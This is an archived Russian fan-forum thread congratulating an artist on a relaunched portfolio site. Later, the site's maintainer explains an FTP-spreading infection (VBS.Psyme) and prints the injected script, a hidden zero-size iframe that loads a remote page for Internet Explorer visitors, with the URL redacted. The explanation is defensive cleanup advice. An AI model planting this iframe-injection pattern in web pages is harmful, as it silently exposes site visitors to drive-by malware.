Помощь - Поиск - Пользователи - Календарь
Полная версия этой страницы: Мой профсайт или "ура, заработало!!!"(с)
Рамотский форум > Друзья > Жилище Аллора > Валмар Многозвонный
Аллор
Вот, свершается!
Мой профессиональный сайт оживает стараниями Гэллорна.
После того, как прошлая версия по неясным причинам канула в непонятно куда, Гэллорн разработал новый дизайн, ну и...
А экспонатов там теперь будет в полтора раза больше, добавилась керамика (уже висит) и еще всякое smile.gif
Короче, вот:
http://ira-art.net/index.html

Я рад yahoo.gif yahoo.gif yahoo.gif
Mixtura
Поздравляю!!!! good.gif

А что рисунки в стиле "Глюков" не вывешиваешь? ИМХО, они классные! yahoo.gif
Хольгер
Поздравляю!!!
Шум
С воскрешением сайта! обязательно загляну посмотреть smile.gif
Сэр Дамиан
Свершилось!!!! Поздравляю!
Аллор
Пасибище!
Скоро там еще всякое будет smile.gif

(Mixtura @ Jan 18 2007, 11:42 AM) *
Поздравляю!!!! good.gif

А что рисунки в стиле "Глюков" не вывешиваешь? ИМХО, они классные! yahoo.gif

Спасибоsmile.gif
Там будут "в стиле", видимо, в работах на заказ...smile.gif
А вообще там работы отличаются от того, что на рамоте (да и к чему дублировать). Здесь(на рамоте) в большей степени фанарт, а там и заказы, и вообще работы. Опять же, не всем клиентам фанарт покажешь, это довольно специфическая тема smile.gif
Хольгер
Замечательно! Мне сайт очень понравился!!!
Темный Эол
Поздравляю! Отличная новость! yahoo.gif
Только на этот раз бэкап нужно сделать на всякий случай, а то мало ли что sorry.gif
Сулэрин
Ура, увидел :))
Ещё раз всмотрелся-вслушался в "Изначальные Петербурга". Да, так оно и есть - эти очертания, проступающие через петербургские улицы...
Аллор
(Темный Эол @ Jan 18 2007, 04:56 PM) *
Поздравляю! Отличная новость! yahoo.gif
Только на этот раз бэкап нужно сделать на всякий случай, а то мало ли что sorry.gif

пасиб!
А сможешь сделать - у тебя-то доступ есть?smile.gif

(Сулэрин @ Jan 18 2007, 05:00 PM) *
Ура, увидел smile.gif)
Ещё раз всмотрелся-вслушался в "Изначальные Петербурга". Да, так оно и есть - эти очертания, проступающие через петербургские улицы...

Ага... они самые. Надо бы серию продолжить...
Темный Эол
(Аллор @ Jan 18 2007, 06:54 PM) *
А сможешь сделать - у тебя-то доступ есть?smile.gif

Да вроде есть smile.gif Так бэкап прямо сейчас сделать или когда поболее материалов будет?
Юкари
Поздравляю, хорошая новость! smile.gif Пусть новый сайт больше не обваливается, а только приумножается и пополняется новыми работами, поэтому - успехов в творчестве и - с новосельем!!!!! party.gif
Аллор
(Темный Эол @ Jan 18 2007, 07:02 PM) *
Да вроде есть smile.gif Так бэкап прямо сейчас сделать или когда поболее материалов будет?


Наверное, когда практически все появится. Спасибище!

Юкари, и тебе спасибо! Постараюсь и контент этого сайта пополнять smile.gif santa2.gif
Хольгер
Анюте безумно понравились чайники!
Вейрд
Аллор, поздравляю (долго, долго меня грызло любопытство - а что там такое?)!
Аллор
Хольгер, мур Анюте smile.gif
Вейрд, ну, вот оно smile.gif
Хольгер
Анюта тоже мяукает smile.gif.
Siore
Ура-ура! smile.gif


ЗЫ: нормальную аватарку мне придется переводить в формат jpg, а как оно - я ж понятья не имею...
Аллор
(Siore @ Jan 26 2007, 03:36 PM) *
Ура-ура! smile.gif


ЗЫ: нормальную аватарку мне придется переводить в формат jpg, а как оно - я ж понятья не имею...

А то, что я тебе вчера отослал, это разве не в джипеге? Вроде, по всем параметрам влазить должна. Эта тоже весьма в образе, но ведь не эксклюзив? smile.gif
Siore
*офтопично* ни х... , она в bmp wink.gif и довести до ума мне ее нечем, что весьма досадно, ибо действительно не эксклюзив, хоть и портретное сходство прослеживается smile.gif
Хольгер
Сиорэ, плюхни мне -- я bmp в jpeg переведу...
Аллор
Или я попробую перевести. Вот незадача, была уверена, что оно в том, в чем надо...
Хольгер
У меня это делается мгновенно smile.gif.
Моргвател
(Выбравшись после долгого зависа инета) АЛЛОР, ПОЗДРАВЛЯЮ!!! yahoo.gif yahoo.gif yahoo.gif
Замечательный сайт! Замечательные работы!
Аллор
(Моргвател @ Feb 5 2007, 12:07 PM) *
(Выбравшись после долгого зависа инета) АЛЛОР, ПОЗДРАВЛЯЮ!!! yahoo.gif yahoo.gif yahoo.gif
Замечательный сайт! Замечательные работы!

С возвращением! smile.gif доброго инетаsmile.gif
И спасибо! Скоро еще будут, надеюсь... Еще далеко не все выложено.
Айкъет Илто
Хоть и запоздало ( будто бывает по - другому rolleyes.gif ), но что мне остаётся ? Только поздравить с замечательным сайтом ! tongue.gif
Все стало куда как лучше cool.gif Не то, что бы раньше было плохо, но сейчас стало действительно лучше. Гэллорн действительно дивно сработал.
Во - первых, палитра стала повеселей. Новый небесный стиль Manwe549lb подходит лучше, чем прежний Nienna693dg cool.gif
Во - вторых, столько новых работ, что просто уух. И керамика, и графика, и живопись... А какой там Крыс ! А какой там Кит ! А какой там батон ! rofl.gif
Всё. Ура !
Аллор
Айкъет Йлто, спасибо! Гэллорн действительно крут, и спасибо ему огромадное.
А дизщайн и вправду еще лучше - элегантнее и более стильный. Еще раз ура Гэлу!

А автопротреты с батоном - ну, тема такая пошла, с живописной точки зрения самой нравится smile.gif
Айкъет Илто
Посмотрел ещё раз, сколько же всякого новенького. Обновлялось, обновляется и ... а будет ли дальше обновляться? А? Мы - то надеемся cool.gif И хатим ищё !!! laugh.gif

... "Ангел..." очень интересный.
Маськин и Морда небритая ...
Батон опять же! biggrin.gif
Аллор
Айкъет Йлто, еще спасиб! Будут обновления, а как же - сайт еще в процессеsmile.gif
Ангел мне самой нравитсяsmile.gif
К морде небритой у меня много иллюстраций было, но не вешать же все... Кстати, надо кросслинк на текст дать...
А Маськин - славные рассказы. Редкий случай, когда работая на заказ не кривишь душойsmile.gif
Гэллорн
Сейчас уже почти все. Кроме штук так десятка. Но это дело поправимое.

>>Кстати, надо кросслинк на текст дать...

А еще кучу всего (в cv), чего я на мыло так и не дождался.
Хольгер
Посмотрел новые картины -- нравится очень!!!
ВАЖНО: ДО ЧАСУ НОЧИ (С 23 НА 24 МАРТА) САЙТ РАБОТАТЬ НЕ БУДЕТ.

Причина: ftp-infector.
Все, кто просматривал что-либо с сайта 22-го вечером и 23-го числа, большая просьба, проверьте технику.
А, да. Это я, Гэл.
Работает. Вроде бы чисто. smile.gif
Аллор
Гэл, пасиб!
Я тут вне аськи вообще, да и в сеть вылезаю раз в несколько дней... Вот приеду... happy.gif
Гэл
Хм. А чего будет, когда приедешь? Будем "пить по телефону"? wink.gif
Аллор
(Гэл @ 6.4.2007, 7:06) *
Хм. А чего будет, когда приедешь? Будем "пить по телефону"? wink.gif

Может, наконец английской версией займемся...
А пить можно и не потелефону, кста, когда ты в наши края-то?wink.gif
Может, наконец английской версией займемся...
А пить можно и не потелефону, кста, когда ты в наши края-то?wink.gif


такими темпами скоро придется заниматься переделкой всего и вся снова. Итак, вся та же радость, волна номер два. Работать не будет до воскресенья - пока не доберусь до компа с полным бэкапом.

ps: Эол, Вы не могли бы сменить пароль? И выяснить заодно, кто сделал аплоад - дело в том, что я в начале недели не зря все снес, эту заразку (вирус то есть) хлебом не корми - дай пихнуть в html или php свой фрейм. А так как кто-то все перезалил - оно, понятное дело, появилось снова. Поэтому удаляю все во второй раз и надеюсь, что такого больше не случится - по крайней мере, пока я не почищу ВСЕ, что там может быть "infected".
Темный Эол
Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. unsure.gif А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел.
(Темный Эол @ 18.4.2007, 21:08) *
Пароль сменить разумеется можно. А выяснять ничего не надо. Аплоад сделал я. Просто увидел что сайт отстствует, ну и залил тот бэкап, который у меня был. Прошу прощения, я поторопился, сначала надо было у вас спросить. unsure.gif А чего там заражено то было? Я сайт посмотрел и ничего такого не увидел.


Вирус: DrWeb опознал как VBS.Psyme (точнее не помню, но скорее всего 206 какой-нибудь)
Распространение: при открытии страницы посредством IE сохраняется в Temporary Internet Files; определяет доступные ftp аккаунты - из far, total commander и прочих файл-манагеров. Cоответственно, втихую копирует продукты своей жизнедеятельности туда, заражая .php и .html файлы. Собственно, он дописывает в конец файла вот это вот:

<!--start_frame0xf--//>
<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln('<iframe
src="##########/index.php" frameborder=0 border=0 width=0 height=0 style="position: absolute; visibility: hidden"></iframe>');
}</script>
<!--end_frame0xf--//>

где тема с "#########/index.php" - (я намеренно прибил ссылку) видимо, система распространения вируса и есть.

Отслеживание: DRWeb начиная с версии 4.33 (с нормальной лицензионной базой) - точно.

Дополнение: он обходит рекурсивно все доступные каталоги. Так что "обсижен" им не только сам сайт, но и все "системные" фолдеры, где попадались файлы с указанным расширением. В первый раз я сливал на локал все и на локале же чистил - ну, дома проще, дома Sabayon стоит. Помогло. Сейчас, видимо, нужно будет либо скрипт писать либо так же, как и в первый раз, поступать.
Темный Эол
Спасибо за пояснения. Не могли бы вы пояснить еще немножко? Я так понял что 24 марта вы почистили сайт от вируса и он стал работать нормально, так? А потом что, он опять появился и вы убрали все html странички?

А меня значит спасло то что я на сайт ходил фаерфоксом. smile.gif Проверился сейчас симантеком, он ничего не нашел. Нет, ну что за свинское счастье, оказывается я скачал себе бэкап содержащий вирус. blink.gif Сейчас посмотрел, во всех файлах есть указанный вами код. Я могу стереть его и залить обратно чистый бэкап. Будет ли этого достаточно? И нужна ли вообще моя помощь?
(Темный Эол @ 19.4.2007, 15:26) *
Спасибо за пояснения. Не могли бы вы пояснить еще немножко? Я так понял что 24 марта вы почистили сайт от вируса и он стал работать нормально, так? А потом что, он опять появился и вы убрали все html странички?


Именно. Кроме тех, которые не в public_html. Но их тоже чистить надо. А для того, чтобы вычистить все прочие сайты, на которые у меня был доступ по работе, писали скрипт, предварительно сменив пароли.

(Темный Эол @ 19.4.2007, 15:26) *
А меня значит спасло то что я на сайт ходил фаерфоксом. smile.gif

из-за - navigator.userAgent.indexOf('MSIE') != -1 - видимо, да.

(Темный Эол @ 19.4.2007, 15:26) *
Проверился сейчас симантеком, он ничего не нашел.


Ну, антивирусы всякие бывают. С чего ради, кстати, вирус у вас на машине должен быть? Пароль он один раз (24 марта) отловил, куда надо - заслал, так что без всякого постороннего участия... Хм... А на моем рабочем компе дырывеб тоже ничего не нашел. Хотя 24 марта - находил результативно.

(Темный Эол @ 19.4.2007, 15:26) *
Нет, ну что за свинское счастье, оказывается я скачал себе бэкап содержащий вирус.

Не факт. Он просто прошелся по незагаженным файлам, и все.

(Темный Эол @ 19.4.2007, 15:26) *
Сейчас посмотрел, во всех файлах есть указанный вами код. Я могу стереть его и залить обратно чистый бэкап. Будет ли этого достаточно? И нужна ли вообще моя помощь?


Нет, не будет. Нужно выкусать все html (htm) и php и проверить каждый. А потом перезалить - с корня начиная (на всякий случай). Что, собственно, я и собираюсь делать на выходных - если сеть будет. Но помощи буду всяко рад.
Темный Эол
Сменил пароль, все html (htm) и php файлы очистил и залил по новой. Теперь лучше? rolleyes.gif
Аллор
Вроде оно все открывается! пасиб вам!
Аллор
Не удивляйтесь, это просто мой заказчик не может аттач открыть, так я ресурс форума в личных целЯх юзаю...
*сие моя халтура, еще не доделанная...*
Хольгер
Аллорушка, а я здешнюю художественную публику с твоим сайтом обрабатываю.
SSDany
Пабам!
Поскольку в данной теме стало слишком тихо, то с радостью сообщаю:
апдейт.

И есть некоторая надежда, что будет еще.
Аллор
Цитата(SSDany @ 11.10.2009, 18:51) *
Пабам!
Поскольку в данной теме стало слишком тихо, то с радостью сообщаю:
апдейт.

И есть некоторая надежда, что будет еще.

Урра и пасиб!!
А уж я-то как надеюсь, но мне ж всякое собрать и надо...
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.
Форум IP.Board © 2001-2024 IPS, Inc.